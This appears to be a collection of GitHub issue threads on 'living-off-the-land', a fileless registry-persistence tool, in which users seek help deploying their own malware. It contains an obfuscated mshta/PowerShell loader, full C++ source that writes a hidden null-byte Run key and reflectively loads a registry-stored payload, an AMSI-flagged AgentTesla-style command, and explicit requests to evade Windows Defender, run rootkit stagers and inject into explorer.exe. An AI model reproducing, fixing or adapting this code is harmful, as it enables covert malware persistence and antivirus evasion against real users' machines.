bytecode77 / living-off-the-land Goto Github PK

Would you be kind enough to show an example of the UI issues in regedit from the null byte key?

Hi,

Thank for your work, it's working perfectly for me, but the issue I have right now is that I have one exe that is a stager, but it supposed to start the rootkit that it downloaded before, but it gets blocked by AV.

It seems quite normal to me, because it was my stager that was starting another exe, but I could not figure a solution for me.

Can you help me?

Hi,

I understood the payload project was the project executed, but is it possible to explain more how to set our own project?

Is a way to just add our executable?

Is there any action or characteristics that might reveal the executable?

BR and excellent work

i'm trying to execute the payload that hides inside a registry key but it cannot, here's what i'm trying:

powershell -Command [System.Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey("Software\Microsoft\Internet Explorer").GetValue($Null)).EntryPoint.Invoke(0,$Null)

it gives me : You cannot call a method on a null-valued expression.

I'm thinking it's due to string escapes but I have NO idea. I want to obfuscate it so windows defender doesn't stop execution. I've tried putting the following into Invoke-Obfuscation

powershell "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\"Software\\Microsoft\\Internet Explorer\").GetValue($Null)).EntryPoint.Invoke(0,$Null)"

and put the output in like this (omitting the base64 so it's not giant)

LPCSTR runCommand = "CMD /C \"SET NOZ=(neW-OBJEcT io.CompREssION.dEFlatEstreAm([SystEm.iO.meMOryStREaM][SYSteM.CONVERT]::frOMBASe64StRinG('++nT09l9XJyel/'), [sYsTeM.Io.COMprESsiON.COmpRessioNmODe]::DecomPReSs) ^ | % {neW-OBJEcT SYStem.Io.STReaMrEAdeR($_, [texT.EncodING]::aScIi)} ^ | % {$_.rEaDToend()}) ^ | &($vErBOsepReFeRENcE.TOSTRIng()[1,3] + 'x' -Join '') && mshta.eXE VBScript : CReATeObJECt('WSCRIPT.ShEll').RUn('powershell . (${pshomE}[21] + ${pshoME}[34] + 'X') ((.( '{0}{1}' -f 'gC', 'i' ) ('{2}{0}{1}' -f 'nv:', 'NOZ', 'E')).'valUE')\", 1, TRue)(WINDOw.CLosE)\"";

But I get no output. With any type of obfuscation / encryption. Even tried encrypting at runtime but
`#include <Windows.h>
#include
#include
#include
#include
#include
#include
#include <wincrypt.h>

#include "../Global/NativeRegistry.h"
#include "resource.h"

#pragma comment (lib, "crypt32.lib")

bool EncryptData(const BYTE* pbData, DWORD cbData, std::vector& encryptedData)
{
HCRYPTPROV hCryptProv = NULL;
HCRYPTKEY hKey = NULL;
HCRYPTHASH hHash = NULL;
DWORD dwBlockLen;
DWORD dwBufferLen;
DWORD dwCount;
bool fSuccess = false;

// Get handle to the default provider.
if (!CryptAcquireContext(&hCryptProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT))
{
    std::cerr << "Error during CryptAcquireContext: " << GetLastError() << std::endl;
    goto exit;
}

// Create a hash object.
if (!CryptCreateHash(hCryptProv, CALG_SHA_256, 0, 0, &hHash))
{
    std::cerr << "Error during CryptCreateHash: " << GetLastError() << std::endl;
    goto exit;
}

// Hash data.
if (!CryptHashData(hHash, pbData, cbData, 0))
{
    std::cerr << "Error during CryptHashData: " << GetLastError() << std::endl;
    goto exit;
}

// Create a symmetric key.
if (!CryptDeriveKey(hCryptProv, CALG_AES_256, hHash, 0, &hKey))
{
    std::cerr << "Error during CryptDeriveKey: " << GetLastError() << std::endl;
    goto exit;
}

// Determine size of the encrypted block.
dwBlockLen = 0;
if (!CryptEncrypt(hKey, NULL, TRUE, 0, NULL, &dwBlockLen, 0))
{
    std::cerr << "Error determining size of the encrypted block: " << GetLastError() << std::endl;
    goto exit;
}


encryptedData.resize(dwBlockLen);

// Encrypt data.
if (!CryptEncrypt(hKey, NULL, TRUE, 0, &encryptedData[0], &dwBlockLen, encryptedData.size()))
{
    std::cerr << "Error during CryptEncrypt: " << GetLastError() << std::endl;
    goto exit;
}

fSuccess = true;

exit:
if (hHash)
CryptDestroyHash(hHash);
if (hKey)
CryptDestroyKey(hKey);
if (hCryptProv)
CryptReleaseContext(hCryptProv, 0);

return fSuccess;

}

int CALLBACK WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
// Read Injector.exe from resources
HRSRC injectorResource = FindResourceA(NULL, MAKEINTRESOURCEA(IDR_INJECTOR), "EXE");
if (!injectorResource) return 0;

DWORD injectorSize = SizeofResource(NULL, injectorResource);
if (injectorSize == 0) return 0;

LPBYTE injectorResourceData = (LPBYTE)LockResource(LoadResource(NULL, injectorResource));
if (!injectorResourceData) return 0;

// Decrypt Injector.exe using a simple XOR algorithm
LPBYTE injector = new BYTE[injectorSize];
BYTE xorKey = 0x77;
for (DWORD i = 0; i < injectorSize; i++)
{
    injector[i] = injectorResourceData[i] ^ xorKey;
    xorKey += 5;
}


std::string powershellCommand = "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\"Software\\Microsoft\\Internet Explorer\").GetValue($Null)).EntryPoint.Invoke(0,$Null)";

std::vector<BYTE> encryptedCommand;
if (!EncryptData((const BYTE*)powershellCommand.c_str(), powershellCommand.length(), encryptedCommand))
{
    std::cerr << "Error encrypting PowerShell command." << std::endl;
    return 0;
}


std::string startupCommand = "mshta \"javascript:close(new ActiveXObject('WScript.Shell').run('powershell \\\"";
startupCommand += std::string((char*)encryptedCommand.data(), encryptedCommand.size()); // Add the encrypted command
startupCommand += "\\\",0))\"";


if (!nt_cpp::SetValue(nt_cpp::GetCurrentUserPath() + L"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\0X", nt_cpp::Udc(std::wstring(startupCommand.begin(), startupCommand.end())))) return 0;


std::string runCommand = "\"[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\\\"Software\\\\Microsoft\\\\Internet Explorer\\\").GetValue($Null)).EntryPoint.Invoke(0,$Null)\"";
ShellExecuteA(NULL, "open", "powershell", runCommand.c_str(), NULL, SW_HIDE);

return 0;

}`

Still nothing. I'm really confused what I'm doing wrong tbh.

my version of visual studio 2019 is giving an error when downloading the project. when I downloaded it by git clone the project gave a compilation error.

Trojan:MSIL/AgentTesla.JMX!MTB

amsi: \Device\HarddiskVolume2\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

mshtA "JAvascRIPt:close(new ActiveXObject('WSc'+'riPT'+'.ShE'+'ll').run('pOwE'+'rSH'+'ELl \"[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\\\"SOFTwArE\\\").GetValue($null)).EntryPoint.Invoke(0,$nuLL)\"',0))"

windows defender won't run it, is there any alternative?
you have a lot of less options trying to run fileless..

Hey,

I saw this line in LivingOffTheLand.cpp

"if (!nt_cpp::SetValue(nt_cpp::GetCurrentUserPath() + L"\Software\Microsoft\Windows\CurrentVersion\Run\\0X", nt_cpp::Udc(startupCommand))) return 0;"

And it seems that some data is stored in the registry key in the Run folder. But when I try to find the data, there is indeed a key withtout name or data in it. How is it possible? How can we check this value?

Do you think AV can detect this key?

I want to be able to run two instance in the same computer, and I know fore sure that the malware can be stored in just another path than Internet Explorer, but how is it possible to start 2 instance at bootup?

Thank again for your support, light me friend!

Hi. nice code! But I am just wondering how am I supposed to insert a payload into registry when it's way over the size limit? in the example I think you used MessageBoxA to call the native API. but what if I want to let's say download the bytes and injected it into explorer.exe process which means this might include multiple API calls? Please correct me if I am wrong on that. The only solution I can think of is that to create more registry keys and store them separately?

Hello @Ogyeet10 here,

Background

I'm attempting to use LOL to install and persist an application (Payload.exe), which is consistently blocked by Windows Defender despite various attempted workarounds (disabling AV, adding exceptions, etc.). The executable is separate from r77 and LOL and should be persistent on the system.

Issue

After replacing the example executable and code in your LivingOffTheLand project with my Payload.exe and recompiling, the installation on a test VM doesn't seem to run the executable as expected. Manual invocation of the assembly loading script ([Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey("Software\Microsoft\Internet Explorer").GetValue($Null)).EntryPoint.Invoke(0,$Null)) showed why:

Exception calling "Invoke" with "2" argument(s): "The magic number in GZip header is not correct. Make sure you are passing in a GZip stream."

Suspected Issue

This error suggests a problem with how the executable is compressed (or not compressed). Upon reviewing the post-build process code, I noticed that EncryptFile.exe is used with the -e flag but not again with the -c flag for compression, which seems inconsistent with the process intended to handle GZip streams.

Questions

1. Could the absence of the -c compression flag in the build process be an oversight, or is it intentional?
2. If it's intentional, could you explain the expected configuration to avoid the GZip header error?
3. Whats generating that error? I don't see any GZip related code in that one-liner.

PS. Sorry about all the issues.

Thanks,
Aidan

Seems like this is patched in Windows 11, calling run() from WScript.Shell results in Access is denied.

Edit: Why do we have to use mshta anyways? Can't we just directly spawn a Powershell process?

Edit 2: Oh look at that it's also issue #11, lol.

Hi,

I decided that the form of my malware should be a dll because it's not known by AV. In windows, we can use the command rundll32 to run it.

I could try to start a batch maybe? I understood that the living off the land executable loaded the content of the payload?

Hi,

I ran the Living off the Land exe, and make sure there is the message "could not display value" when seeing the registry.
When I run the removaltool, it say that it was removed successfully, so it seem to work.

Besides that, I know for sure that the Living off the land exe did not work because the stager did not run (he's supposed to download the rootkit files).

Does I use something wrong? Does it work on your system?
I use a Windows VM, and I have an hard time trying to just make program run at bootup, so maybe it comes from there..

BR